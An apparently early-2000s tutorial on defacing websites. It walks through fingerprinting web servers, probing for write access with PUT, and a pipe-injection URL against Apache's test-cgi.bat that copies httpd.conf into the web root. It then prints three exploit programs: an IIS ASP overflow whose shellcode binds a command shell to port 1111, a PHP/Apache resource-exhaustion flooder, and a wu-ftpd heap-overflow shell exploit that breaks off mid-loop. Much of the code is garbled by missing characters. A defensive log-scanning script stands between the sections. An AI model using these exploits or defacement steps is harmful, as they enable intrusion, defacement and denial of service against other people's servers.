Hacking a website

Defacing Websites

--------------------------------------------------------------------------------

Defacing websites is one of the hottest topics in today's IT world.
Crackers, script kiddies and sometimes hackers pave their path to
fame by defacing websites. In most cases websites are defaced either to
spread a message to the public, for fun, or for other reasons not worth mentioning here!!
In this article I'll explain most of the intricacies of website defacement.
Generally websites are defaced by exploiting known vulnerabilities in web
servers and gaining a root shell, or by injecting malicious code into the target
page residing on the server. In this manual I'll mainly describe methods
of exploiting a vulnerable Microsoft IIS web server. Apache is another
popular web server, and a much more secure one, but I don't know much
about defacing a website hosted on Apache. Still, I'll try to give a theoretical
explanation of Apache servers.
This article is mainly divided into the following parts:
- Web server software detection.
- Analyzing web server configurations.
- Checking for known vulnerabilities.
- Coding exploits.
- Exploiting known vulnerabilities for breaking into the server.
- Injecting malicious code through the URL.
- Keeping yourself safe.
- Last notes.
Web Server Detection
Defacing websites is not hacking at all. It doesn't need a hacker's brain or a hacker's genius.
All it needs is looking for exploits, a good deal of programming skill and plenty of time for
trial and error. Basically, every piece of software has some vulnerabilities
(mistakes in programming), and by exploiting them one can get root (administrator-privileged)
access to the system running that particular vulnerable software. Websites are defaced
using this concept. You can find lots of recently discovered vulnerabilities on websites
like http://www.securityfocus.com, http://www.packetstormsecurity.com
and http://www.securiteam.com; some of these sites even offer exploit code.
But before you look for exploits or vulnerabilities on those sites you need to know
which server software your target website is running. Only after knowing the server
software should you look for vulnerabilities and exploits corresponding
to that particular software.
Web server detection is quite easy, if a bit obvious. When a request is sent to a
web server in raw mode (that is, through telnet) that compels it to generate a 400 Bad Request
error message, a 200 OK message or a 403 Forbidden error message, the server software
responds with the corresponding message, which contains its web server software along with
version info. So what we need to do is just telnet into port 80 (the default port for web
servers) of a web server and send some request so that the server responds with a 400 Bad
Request error message or a 200 OK message, which will contain the server software and
version info.
Microsoft Telnet>telnet 127.0.0.1 80
GET HTTP/1.1\r\n\r\n
Host:server-software

HTTP/1.1 403 Forbidden
Date: Sat, 10 Aug 2002 16:55:41 GMT
Server: Apache/1.3.22 (Win32)
Connection: close
Content-Type: text/html; charset=iso-8859-1

403 Forbidden

Forbidden

You don't have permission to access / on this server.

Apache/1.3.22 Server at www.apache.org Port 80

Connection to host lost.
OK, I hope you got it; it's quite simple. In brief, what you need to do is telnet into
port 80 of your target website (you can even telnet to the domain name, i.e. telnet
hackersclub.up.to 80), type in a request like GET HTTP/1.1\r\n\r\n, then type
something like Host:server-software, then press Enter a few times until you
get the server's response. The server will respond with its software info.
ANALYZING WEB SERVERS
Basically a default IIS (Internet Information Services) installation keeps the website root at c:\Inetpub\wwwroot. All the directories inside c:\Inetpub (in the case of IIS; c:\apache group\apache\htdocs for the win32 version of Apache) are regarded as virtual directories. In a web server each virtual directory is given different types of permissions: Read, Write, Execution of scripts, Execution of executables like DLLs and server-side pages like ASP, CGI etc., and Directory Browsing.
Here I am going to describe the methods of analyzing the directory permissions of a virtual directory residing in a web server.
Read Access : Whenever you visit a website by typing its domain name into your web browser, what actually happens is that you are connected to port 80 (the default HTTP port) of the IP address associated with the domain name. Say the IP address of yahoo.com is 203.197.102.78. So when you write http://www.yahoo.com in your web browser's address bar, this URL (Uniform Resource Locator) is resolved to http://203.197.102.78:80/index.html (or index.htm, index.asp, default.asp, index.jsp, default.jsp, /, default.php or whatever is configured as the index page in the web server). On typing the URL you will be taken to yahoo's website, where you will be able to read contents from its wwwroot. If it contains executables like ASP, JSP or PHP, then those server-side pages are executed and the HTML is generated and passed to the browser (client) by IIS (the server) or any other web server dynamically. Now, when you can read a document from a given directory, it indicates that the directory is readable. Basically directories containing database files are denied read access for security reasons.
Note : if you are a real newbie who doesn't know about IP addressing, read my article on tracing IPs to get a brief idea of IP addressing.
Write Access: As I have always suggested to the members of my website, go through the RFCs (Requests for Comments) on important protocols like HTTP (Hyper Text Transfer Protocol), TELNET, FTP (File Transfer Protocol), SMTP (Simple Mail Transfer Protocol) etc. Those who have read the RFC on HTTP would definitely know what write access means in a web server. For those who haven't come across the HTTP RFC, I should give a brief description of the HTTP protocol. HTTP is a part of the TCP/IP stack (correct me if I am wrong). It was designed and developed with the intention of sharing files across the internet, as is obvious from the name, since HTTP stands for Hyper Text Transfer Protocol. Initially files could be uploaded to and downloaded from the server according to the HTTP protocol without the need for any type of authentication. Soon it was realized that this kind of architecture is a real security threat, because anybody with half a brain could have write access to a particular server. What was done is that web servers are now designed and configured to give write access to only selected virtual directories.
Try telnetting into a website and play around with it to get some practical information about servers and their behaviour. Here's a list of commonly used commands supported by a web server according to the HTTP RFC.
GET : used by the browser (client) to send a request for read access to a file residing on the server
Example :
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com
GET /index.html HTTP/1.1\r\n\r\n
Output:
The HTML source of the index.html page residing on the server will be returned, or, if you requested an ASP, JSP or any other server-side executable page, the dynamically generated HTML will be displayed.
PUT : used to create a file on the server; requires write access on the virtual directory where the file is to be created.
Example:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com
PUT /analyzing.txt HTTP/1.1\r\n\r\n
Output :
Most probably, or better to say definitely, you will get a 403 Forbidden error, as it is obvious that the wwwroot will never have write access.
DEL : for deleting a page on the web server; requires write access on the virtual directory where the file is to be deleted.
Example:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com
del /index.html HTTP/1.1\r\n\r\n
Output :
Most probably, or better to say definitely, you will get a 403 Forbidden error, as it is obvious that the wwwroot will never have write access.
ECHO : the printing tool, the same as used in DOS batch files. The output can be redirected.
Example:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com
ECHO defaced by Abhisek Datta >> /index.html HTTP/1.1\r\n\r\n
PROPFIND : used as a request for directory browsing (for IIS; actually it's an administrative tool used for web server analysis)
Example:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com
PROPFIND / HTTP/1.1
Host:iis-server
Content-Length:0
Output :
Most probably, or better to say definitely, you will get a 403 Forbidden error, as it is obvious that the wwwroot will never have write access.
To test the write-access permission of a directory in Microsoft IIS in a slightly more advanced way, follow this method.
To test if write permission is enabled for anonymous web clients, telnet into the web server port (usually TCP port 80) and make the following request:
PUT /scripts/abhisek.asp HTTP/1.1
Host: iis-server
Content-Length: 10
At this stage the server should respond with a 100 Continue message.
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:00 GMT
On receiving this, type 10 letters:
AAAAAAAAAA
HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:08 GMT
Location: http://iis-server/dir/my_file.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND,
PROPPATCH, SEARCH, LOCK, UNLOCK
If the server responds with this 201 Created response then write permission is enabled.
Execution Access : Server-side pages (ASP, JSP, PHP), DLLs (dynamic link libraries) etc. are often used in today's highly advanced database-driven dynamic websites, which dynamically generate the HTML and send it to the client (browser). These server-side pages and other executables, including DLL and EXE files, need execution privileges in the virtual directory where they are kept. Generally all the DLL, ASP and EXE files which need execution privileges are kept in a single virtual directory.
Directory Browsing : Often web servers (or, to be more specific, the virtual directories of a web server) are configured to provide directory browsing access to all clients, or to special clients through proper authentication. Basically directory browsing means you can list the files and folders present in the specified virtual directory, just as you see them on your computer. For security reasons most production-level websites turn off this feature. But exploits can be used to get a directory listing of a virtual directory.
Exploit for Directory Listing in Apache (win32) :
One of the most preferred web servers, Apache (win32) 2.1.x (I am not sure about the version), by default contains a .bat file named test-cgi.bat in its cgi-bin directory. It was actually provided so that system administrators can test the privileges of the cgi-bin directory, which contains all the CGI and Perl scripts. Obviously this cgi-bin virtual directory has execution permission. These conditions are exploited to perform our attack. Basically, when a .bat file in the win32 version of the Apache web server is called for execution, a DOS (Disk Operating System) shell is spawned to execute it. Now we can use the | (pipe) character along with the batch file name to execute commands on the remote server. The attack URL will be something like this :
http://www.target.com/cgi-bin/test-c...shttpd.c onf
So by this attack URL what I have done is copy the httpd.conf file from the conf directory, which hardly ever has read access, to the Apache web root, i.e. the htdocs virtual folder. Now we can easily download the httpd.conf file using the URL http://target.com/httpd.conf since it now resides in the Apache web root.
Note: For those who are not acquainted with Apache and don't know what the httpd.conf file is: well, in Apache you have to configure your entire web server using commands and scripts which are kept in the httpd.conf file in the c:\apache group\apache\conf folder of a default Apache installation on a typical Windows system. This file contains all the settings of the target web server, and if somehow we can manage to get our hands on this file then we can have a clear idea about all the settings of the web server, including the location of log files, directory permissions, write access, authentication levels etc.
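The defender's side of the checks above, as an added example that is not part of the original article: a small Python log checker that reads Apache/IIS common-log-format lines and flags the write and WebDAV methods the 201 Created response advertises in its Allow header, a PUT that actually got a 201, a non-standard method such as the ECHO example, a .bat under cgi-bin called with a pipe in the URL, and httpd.conf being fetched from the web root. The log lines, IP addresses and rule names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Methods listed in the page's 201 Created "Allow:" header; any of these from an
# anonymous client means the virtual directory may be writable or browsable.
WRITE_OR_DAV_METHODS = {
    "PUT", "DELETE", "COPY", "MOVE", "PROPFIND", "PROPPATCH",
    "SEARCH", "LOCK", "UNLOCK",
}
# Everything a normal browser or client would send; anything else is a probe.
KNOWN_METHODS = {"GET", "HEAD", "POST", "OPTIONS", "TRACE"} | WRITE_OR_DAV_METHODS

# Common log format: host ident user [time] "method path proto" status bytes
_CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_clf(line):
    """Return a dict for one common-log-format line, or None if it does not parse."""
    m = _CLF.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Decode %7C and friends once so an encoded pipe is not missed.
    rec["decoded_path"] = unquote(rec["path"])
    return rec


def classify(rec):
    """Return a list of (rule, detail) findings for one parsed request."""
    findings = []
    method = rec["method"].upper()
    path = rec["decoded_path"]
    lower = path.lower()

    if method in WRITE_OR_DAV_METHODS:
        # A 201 on PUT is the page's own confirmation that write access is on.
        confirmed = method == "PUT" and rec["status"] == 201
        severity = "confirmed-write" if confirmed else "probe"
        findings.append(("write-or-dav-method",
                         f"{method} {path} -> {rec['status']} ({severity})"))
    elif method not in KNOWN_METHODS:
        findings.append(("unknown-method", f"{method} {path} -> {rec['status']}"))

    # test-cgi.bat style abuse: a .bat under cgi-bin with a shell pipe in the URL.
    if "/cgi-bin/" in lower and ".bat" in lower and "|" in path:
        findings.append(("cgi-bat-pipe", f"{method} {path}"))

    # httpd.conf served from the document root means it was copied there.
    if lower.rstrip("/").endswith("httpd.conf"):
        findings.append(("config-in-webroot", f"{method} {path} -> {rec['status']}"))

    return findings


def scan_log(lines):
    """Run every rule over the log; return [(ip, rule, detail), ...]."""
    results = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue
        for rule, detail in classify(rec):
            results.append((rec["ip"], rule, detail))
    return results


# Constructed sample log (not real traffic); addresses and paths are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Aug/2002:16:55:41 +0000] "GET /index.html HTTP/1.1" 200 1532',
    '203.0.113.5 - - [10/Aug/2002:16:56:02 +0000] "PUT /analyzing.txt HTTP/1.1" 403 0',
    '203.0.113.5 - - [10/Aug/2002:16:56:30 +0000] "PROPFIND / HTTP/1.1" 403 0',
    '203.0.113.5 - - [10/Aug/2002:16:57:10 +0000] "PUT /scripts/abhisek.asp HTTP/1.1" 201 0',
    '203.0.113.5 - - [10/Aug/2002:16:57:40 +0000] "ECHO /index.html HTTP/1.1" 501 0',
    '203.0.113.5 - - [10/Aug/2002:16:58:00 +0000] "GET /cgi-bin/test-cgi.bat?%7Ccommand HTTP/1.1" 200 812',
    '203.0.113.5 - - [10/Aug/2002:16:58:45 +0000] "GET /httpd.conf HTTP/1.1" 200 20481',
    '198.51.100.7 - - [10/Aug/2002:17:00:00 +0000] "GET /about.html HTTP/1.1" 200 901',
]

if __name__ == "__main__":
    for ip, rule, detail in scan_log(SAMPLE_LOG):
        print(f"{ip}  {rule:<20} {detail}")
```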
CHECKING FOR KNOWN VULNERABILITIES
Mostly websites are defaced and hacked using vulnerabilities associated with the server software or the operating system running the server software. Most of the so-called hackers deface websites using vulnerabilities found by people who deserve to be called hackers. I guess you must know what a vulnerability is. It's actually an existing flaw in the software architecture which allows a hacker or a malicious cracker to take control over the system or issue arbitrary system commands to the server. There are a hell of a lot of vulnerabilities in almost all software. In the old days, I have heard, hackers used to find flaws and vulnerabilities in software on their own. But today I guess there are very few people who do so. There are so many good sites like :
http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com
These sites contain more than enough of the latest vulnerabilities to help you get
started. Even if you are experienced I am sure you'll get a lot of help from these sites.
CODING EXPLOITS
Say you are targeting the website http://www.anisurrahman.net
(gosh!! Anisur will kick my ass if he reads this article).
Using the methods described above you can easily find that the website
is running on Microsoft IIS 5.0 server software.
Now it is time to look for exploits (I am assuming you are not a
hacker who can find his own vulnerabilities; if you are, you don't need to
read this article). Even if you find some overflow or malloc vulnerability in
the web server software on the above-mentioned sites, you need to write programs
(generally in C or Perl) to implement the exploit for that vulnerability.
For this you definitely need very good programming knowledge
with a socket-coding background. If you can't code your own exploits you can
download exploits coded in languages like C, Perl or (rarely) Java.
But hey, if you download a great exploit written in C which claims to get you a root shell
on the target web server, then while compiling it I am sure you'll
find a lot of errors, because C syntax and functions differ somewhat from compiler
to compiler. Now you will realize the need for quite a lot of programming background
and pretty good programming knowledge.

Here's a list of some known vulnerabilities and exploits coded for them :
1. This .ASP overflow exploit will open port 1111 and bind cmd.exe to it.
It should be noted that every time you run this exploit a message will
show that it worked perfectly. However, that does not mean you have got
access to the target host; the reason is that on some occasions a
message box will appear on the victim's terminal screen showing that an AV (Access Violation)
has occurred.
/* Windows 2000 Server Exploit By CHINANSL Security Team.
Test on Windows 2000 Chinese Version, IIS 5.0 , not patched.
Warning:THIS PROGRAM WILL ONLY TEST.
CHINANSL Technology CO.,LTD http://www.chinansl.com
keji@chinansl.com
use MS VC++ to compile this piece of code
*/
#include "stdafx.h"
#include
#include
#include
#include
#pragma comment (lib,"Ws2_32")
int main(int argc, char* argv[])
{
if(argc != 4)
{
printf("%s ip port aspfilepathnn",argv[0]);
printf(" ie. %s 127.0.0.1 80 /iisstart.aspn",argv[0]);
puts(" programed by keji@chinansl.com");
return 0;
}
DWORD srcdata=0x01e2fb1c-4;//0x00457474;
//address of SHELLCODE
DWORD jmpaddr=0x00457494; //0x77ebf094;/ /0x01e6fcec; //"x1cxfbxe6x01"; //"x0cxfbxe6x01";
char* destIP=argv[1];
char* destFile=argv[3];
int webport=atoi(argv[2]);
char* pad="xccxccxccxcc" "ADPA" "x02x02x02x02" "PADP"; //16 bytes
WSADATA ws;
SOCKET s;
long result=0;
if(WSAStartup(0x0101,&ws) != 0)
{
puts("WSAStartup() error");
return -1;
}
struct sockaddr_in addr;
addr.sin_family=AF_INET;
addr.sin_port=htons(webport);
addr.sin_addr.s_addr=inet_addr(destIP);
s=socket(AF_INET,SOCK_STREAM,0);
if(s==-1)
{
puts("Socket create error");
return -1;
}
if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == -1)
{
puts("Cannot connect to the specified host");
return -1;
}
char buff[4096];
char* shellcode="x55x8bxecx33xc0xb0xf0xf7xd8x0 3xe0x8bxfcx33xc9x89"
"x8dx2cxffxffxffxb8x6bx65x72x6exabxb8 x65x6cx33x32"
"xabx32xc0xaaxb8x77x73x6fx63xabxb8x6b x33x32x2exab"
"x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2e xabx32xc0x4f"
"xaaxb8x23x80xe7x77x8dx9dx10xffxffxff x53xffxd0x89"
"x45xfcxb8x23x80xe7x77x8dx9dx19xffxff xffx53xffxd0"
"x89x45xf8xbbx4bx56xe7x77x6ax47xffx75 xfcxffxd3x89"
"x45xf4x6ax48xffx75xfcxffxd3x89x45xf0 x33xf6x66xbe"
"x1dx02x56xffx75xfcxffxd3x89x45xecx66 xbex3ex02x56"
"xffx75xfcxffxd3x89x45xe8x66xbex0fx03 x56xffx75xfc"
"xffxd3x89x45xe4x66xbex9dx01x56xffx75 xfcxffxd3x89"
"x85x34xffxffxffx66xbexc4x02x56xffx75 xfcxffxd3x89"
"x85x28xffxffxffx33xc0xb0x8dx50xffx75 xfcxffxd3x89"
"x85x18xffxffxffx6ax73xffx75xf8xffxd3 x89x45xe0x6a"
"x17xffx75xf8xffxd3x89x45xdcx6ax02xff x75xf8xffxd3"
"x89x45xd8x33xc0xb0x0ex48x50xffx75xf8 xffxd3x89x45"
"xd4x6ax01xffx75xf8xffxd3x89x45xd0x6a x13xffx75xf8"
"xffxd3x89x45xccx6ax10xffx75xf8xffxd3 x89x45xc8x6a"
"x03xffx75xf8xffxd3x89x85x1cxffxffxff x8dx7dxa0x32"
"xe4xb0x02x66xabx66xb8x04x57x66xabx33 xc0xabxf7xd0"
"xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfe xc8xabx33xc0"
"xabx40xabx8dx45xb0x50x33xc0x66xb8x01 x01x50xffx55"
"xe0x33xc0x50x6ax01x6ax02xffx55xdcx89 x45xc4x6ax10"
"x8dx45xa0x50xffx75xc4xffx55xd8x6ax01 xffx75xc4xff"
"x55xd4x33xc0x50x50xffx75xc4xffx55xd0 x89x45xc0x33"
"xffx57x8dx45x8cx50x8dx45x98x50x8dx45 x9cx50xffx55"
"xf4x33xffx57x8dx45x8cx50x8dx45x90x50 x8dx45x94x50"
"xffx55xf4xfcx8dxbdx38xffxffxffx33xc9 xb1x44x32xc0"
"xf3xaax8dxbdx38xffxffxffx33xc0x66xb8 x01x01x89x47"
"x2cx8bx45x94x89x47x38x8bx45x98x89x47 x40x89x47x3c"
"xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50 x8dx85x38xff"
"xffxffx50x53x53x53x6ax01x53x53x8dx4d x80x51x53xff"
"x55xf0x33xc0xb4x04x50x6ax40xffx95x34 xffxffxffx89"
"x85x30xffxffxffx90x33xdbx53x8dx85x2c xffxffxffx50"
"x53x53x53xffx75x9cxffx55xecx8bx85x2c xffxffxffx85"
"xc0x74x49x33xdbx53xb7x04x8dx85x2cxff xffxffx50x53"
"xffxb5x30xffxffxffxffx75x9cxffx55xe8 x85xc0x74x6d"
"x33xc0x50xffxb5x2cxffxffxffxffxb5x30 xffxffxffxff"
"x75xc0xffx55xccx83xf8xffx74x53xebx10 x90x90x90x90"
"x90x90x6ax32xffx95x28xffxffxffxebx99 x90x90x33xc0"
"x50xb4x04x50xffxb5x30xffxffxffxffx75 xc0xffx55xc8"
"x83xf8xffx74x28x89x85x2cxffxffxffx33 xc0x50x8dx85"
"x2cxffxffxffx50xffxb5x2cxffxffxffxff xb5x30xffxff"
"xffxffx75x90xffx55xe4x85xc0x74x02xeb xb4xffx75xc4"
"xffx95x1cxffxffxffxffx75xc0xffx95x1c xffxffxffx6a"
"xffxffx95x18xffxffxff";

char* s1="POST ";// HTTP/1.1rn";
char* s2="Accept: */*rn";
char* s4="Content-Type: application/x-www-
form-urlencodedrn";
char* s5="Transfer-Encoding:
chunkedrnrn";
char* sc="0rnrnrn";
char shellcodebuff[1024*8];
memset(shellcodebuff,0x90,sizeof
(shellcodebuff));
memcpy(&shellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1],shellcode,strlen(shellcode));
shellcodebuff[sizeof(shellcodebuff)-1] = 0;

char sendbuff[1024*16];
memset(sendbuff,0,1024*16);
sprintf(sendbuff,"%s%s?%s HTTP/1.1rn%sHost: %srn%s%s10rn%srn4rnAAAArn4rnBBBBrn%s ", s1, destFile, shellcodebuff, s2, destIP, s4,s 5, pad/*,srcdata,jmpaddr*/, sc);

int sendlen=strlen(sendbuff);
*(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr;
*(DWORD *)strstr(sendbuff,"AAAA") = srcdata;
result=send(s,sendbuff,sendlen,0);
if(result == -1 )
{
puts("Send shellcode error!");
return -1;
}
memset(buff,0,4096);
result=recv(s,buff,sizeof(buff),0);
if(strstr(buff,"") != NULL)
{
shutdown(s,0);
closesocket(s);
puts("Send shellcode error!Try again!");
return -1;
}

shutdown(s,0);
closesocket(s);
printf("nUse to connect to the hostn",destIP);
puts("If you cannot connect to the host,try run this program again!");
return 0;
}
------------------------------------------------------------------------
2.
/* PHP-APACHE.C
* By Matthew Murphy
* Exhaust CGI Resources via PHP on Apache
*
* Calling PHP with no parameters causes it to
* never terminate; the process must be killed
* by the server, the OS, or the admin.
*
* PHP on Apache requires you to configure a
* virtual to load PHP out of. PHP implements
* a "cgi.force_redirect" value to require that
* a certain environment variable be set to
* allow PHP to run further.
*
* However, an empty command-line *still* will
* cause PHP to hang. If a remote user does
* this for a lengthy amount of time, the server
* may no longer launch PHP or other server-side
* components.
*
* NOTE: The vulnerable config is on Apache,
* but other servers can still be exploited
* if they offer PHP.EXE (or an SAPI) directly.
*
* Usage: php-apache [phpbin] [port] [maxsocks]
*/
#include
#include
#ifdef _WIN32
#define _WINSOCKAPI_ /* Fix for Winsock.h redef errors */
#include /* WinSock API calls... */
#define WSA_VER 0x0101 /* WinSock ver. to use */
#pragma comment(lib, "wsock32.lib") /* Check your compiler's docs... */
#else
#include
#include
#include
#include
#include
#include
#include
#endif
#define DEF_PHP "/php/php" /* This is used as the PHP
* path if one isn't set
*/
static char php_buf[] = "GET %s HTTP/1.0x0dx0ax0dx0a";
void main(int argc, char *argv[]) {
char host[257];
char binpath[257];
int maxsocks;
char request[300];
unsigned short port;
struct hostent *he;
struct sockaddr_in sa_in;
#ifdef _WIN32
WSADATA wsa_prov;
SOCKET s;
#else
int s;
#endif
printf("PHP-APACHE.C by Matthew Murphyx0dx0a");
printf("Exhausting CGI resources w/ PHP on Apachex0dx0ax0dx0a");
maxsocks = 0;
strcpy(&binpath[0], DEF_PHP);
#ifdef _WIN32
if (!WSAStartup(WSA_VER, &wsa_prov) == 0) {
printf("ERROR: Windows Sockets init failed!");
exit(1);
}
#endif
port = (unsigned short)htons(80);
switch (argc) {
case 5:
maxsocks = atoi(argv[4]);
case 4:
port = htons((unsigned short)atoi(argv[2]));
case 3:
if (strlen(argv[2]) > 256) {
printf("ERROR: 256 char path limit exceeded in 'phpbin' argument.");
exit(1);
}
strcpy(&binpath[0], argv[2]);
case 2:
if (strlen(argv[1]) > 256) {
printf("ERROR: No host should be over 256 chars!");
exit(1);
}
strcpy(&host[0], argv[1]);
break;
default:
printf("Usage: php-apache [port] [maxsocks] [phpbin]x0dx0ax0dx0ahost - The IP/DNS name to attackx0dx0aport - The port the HTTP service normally runs on (default: 80)x0dx0amaxsocks - The maximum number of connections to establish (creates a finite flood). A zero value means continue until termination (default: 0)x0dx0aphpbin - The virtual path to the PHP binary (e.g, /php/php[.exe]; default: /php/php)");
exit(0);
}
if (maxsocks == 0) {
maxsocks--;
}
sa_in.sin_family = AF_INET;
sa_in.sin_port = (unsigned short)port;
he = gethostbyname(&host[0]);
if (he == NULL) {
printf("ERROR: DNS resolution failed, or unknown host.");
exit(1);
}
#ifdef _WIN32
sa_in.sin_addr.S_un.S_addr = (unsigned long)*(unsigned long *)he->h_addr;
#else
sa_in.sin_addr.S_addr = (unsigned long)*(unsigned long *)he->h_addr;
#endif
sprintf(&request[0], &php_buf[0], &binpath[0]);
while (!maxsocks == 0) {
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
printf("Couldn't create socket...x0dx0aIf you continue to receive this error, terminate the program.");
} else {
if (!connect(s, (const struct sockaddr FAR *)&sa_in, sizeof(struct sockaddr_in)) == 0) {
printf("Couldn't connect...x0dx0aIf you continue to receive this error, terminate the program.");
} else {
send(s, (char FAR *)&request[0], strlen(&request[0]), 0);
/* If the exploit isn't using up server resources
* try removing this -- the server may be killing
* the CGI after a disconnect.
*/
#ifdef _WIN32
shutdown(s, SD_BOTH);
closesocket(s);
#else
close(s);
#endif
}
}
if (!maxsocks == -1) {
maxsocks--;
}
}
return;
}
------------------------------------------------------------------------
3. /*
* wu-ftpd 2.6.[0/1] remote heap overflow exploit
* wu-ftpd 2.5.* does also overflow and disconnect when you "cwd ~{"
* but it does not seem to be exploitable for some reason...
*
* Original Code by zen-parse
* This code was finished by CraigTM at 23-01-2002
*
* thanks to Krissa from #java@efnet for this:
* From the Integer API docs: Integer.parseInt("-FF", 16) returns -255
*
* thanks to dvorak for inspiring me; it works() now ;)
*
* This works (nearly) like zen-parses code, but gives you a shell...
*
* I wanted to challenge myself and prove that remote exploits can be
* done with java...(hello pr0ix!)...I also had way too much time ;)
*
* java woot [IP] {heap}
*
* CraigTM [ElectronicSouls]
*
* P.S.: I know that the Reader/Write class sucks, but it was done within minutes ;)
* P.P.S.:Have fun with the new targets ;)
*
*/
import java.io.*;
import java.net.*;
import java.util.*;
class woot
{

//type, got, inpbuf, string to check for (autodetect)
static String targets[] =
{
"RH7.0 - 2.6.1(1) Wed Aug 9 05:54:50 EDT 2000", // by zen-parse
"08070cb0","08084600","2.6.1(1) WED AUG 9 05:54:50 EDT 2000",

"RH7.2 - wu-2.6.1-18 by kanix - verified by CraigTM", // doesnt seem to be
"08072af8","08085900","WU-2.6.1-18", // exploitable...

//"wu-2.6.1(2) by zen-parse", // zen-parse's common compile
//"0806ca48","0807e380","WU-2.6.1(2)", // seems useless in the wild

"wu-2.6.0(x) from www.wu-ftpd.org by CraigTM", //done by me
"0806bae4","0807d600","WU-2.6.0(",

"wu-2.6.1(x) from www.wu-ftpd.org by CraigTM", //done by me
"0806c028","0807db40","WU-2.6.1(",

null
};

//socket stuff
static DataInputStream sin;
static PrintStream sout;
static Socket s = null;

//shellcode
static char sc[]={0x55,0x89,0xe5,0x31,0xc0,0x31,0xdb,0x31,0xc9,0xb 0,0x17,0xcd,0x80,0xb0,0x2e,0xcd,0x80,0xeb,0x43,0x5 e,0xb0,0x27,0x8d,0x5e,0x09,0xb1,0xed,0xcd,0x80,0x3 1,0xc9,0x31,0xc0,0xb0,0x3d,0xcd,0x80,0xba,0x2e,0x2 e,0x2f,0xff,0x8d,0x5d,0x04,0xb1,0x10,0x89,0x55,0x0 4,0x83,0xc5,0x03,0xe0,0xf8,0x89,0x4d,0x04,0xb0,0x3 d,0xcd,0x80,0x89,0xf3,0x89,0x75,0x08,0x89,0x4d,0x0 c,0xb0,0x0b,0x8d,0x4d,0x08,0x8d,0x55,0x0c,0xcd,0x8 0,0x31,0xc0,0xb0,0x01,0xcd,0x80,0xe8,0xb8,0xff,0xf f,0xff};
static int sclength=91;
//guess what?
static String victim="";

//your shell
static Thread reader, writer;

//vars
static int m=0;

static long tmp_got;
static long tmp_heap;
static long tmp_inpbuf;

void connect(String Server)
{
try
{

s = new Socket(Server, 21);
sin = new DataInputStream (s.getInputStream());
sout = new PrintStream (s.getOutputStream());

}//try
catch (IOException e){System.out.println("Error Connecting:"+e);System.exit(-1);}
}//connect()


boolean allowsAnonymous()
{
String line=null;

try
{
connect(victim);
System.out.print(".");

boolean Ano=false;
if(s!=null)sout.println("USER planetsubhro");

System.out.print(".");

while(true)
{
if(s==null)break;
line=sin.readLine();
if(line==null)break;

if(line.indexOf("220")<=-1)
break;
line=line.toUpperCase();

for(int i=0;targets[i]!=null;i++)
{
if(line.indexOf(targets[i])>-1)
{
m=(i/4)+1;
break;
}
}

System.out.print(".");

if(s!=null)
{
sout.println("PASS sms1324");
sout.println("QUIT");
}

while(Ano==false)
{
line=sin.readLine();
if(s==null || line==null)break;

if(line.indexOf("331")>-1)
{
line=sin.readLine();
if(line==null || s==null)break;
}

if(line.indexOf("230")>-1)
return true;

if(line.indexOf("530")>-1 || line.indexOf("531")>-1)
return false;

}//while (Ano==false)
}//while(true)

//close socket again
if(s!=null)
{
try
{
s.close();s=null;sin=null;sout=null;
}
catch(IOException e){}
}

}//try
catch (IOException e){}

return false;

}//Anonymous check + get server



void shell()
{
reader.setPriority(6);
writer.setPriority(5);

reader.start();
writer.start();
Thread t = Thread.currentThread();
try {t.sleep(1000);} catch (InterruptedException e) {}

woot.sout.println("uname -a;id;");
}




void dosend(String s)
{
for(int i=0;i
{
if(s.charAt(i)==0xff)
sout.print(s.charAt(i));
sout.print(s.charAt(i));
}
}

void getTarget()
{
try
{

System.out.print("@@ Server>");
DataInputStream in = new DataInputStream (System.in);
victim=in.readLine();

}
catch (IOException e){}
}//getTarget()


boolean works(long n)
{
String v0=Long.toHexString(n);

String elements[]=new String[5];
elements[0]=v0.substring(0,2);
elements[1]=v0.substring(2,4);
elements[2]=v0.substring(4,6);
elements[3]=v0.substring(6,8);

for(int i=0;elements[i]!=null;i++)
{
if(elements[i].equals("00"))return false; //0x00 -> null byte
if(elements[i].equals("0a"))return false; //0x0a -> n
if(elements[i].equals("40"))return false; //0x40 -> @
}

return true;
}





boolean force()
{
char ok;

long l;
long got,inp;

long en=0+(256*1024);
long st=2048;

System.out.println("++ Option #"+m+" chosen.");
m=(m-1)*4;

System.out.println("++ Exploiting "+targets[m]+"n");

long tmp = Long.parseLong(targets[m+2],16);

st= st + tmp + Long.parseLong("6400", 16);
en= en + tmp + Long.parseLong("6400", 16);

got=Long.parseLong(targets[m+1],16);
inp=Long.parseLong(targets[m+2],16);

tmp_got=got-12;
tmp_inpbuf=inp+20;

System.out.println("got:t"+Long.toHexString(tmp_g ot+12)+"ninpbuf:t"+Long.toHexString(tmp_inpbuf-20));
System.out.println("brute forcing heap (from "+Long.toHexString(st)+" to "+Long.toHexString(en)+"):");

for(l=st;l
{
for(m=0;(m!=16&&m<32);m+=4)
{

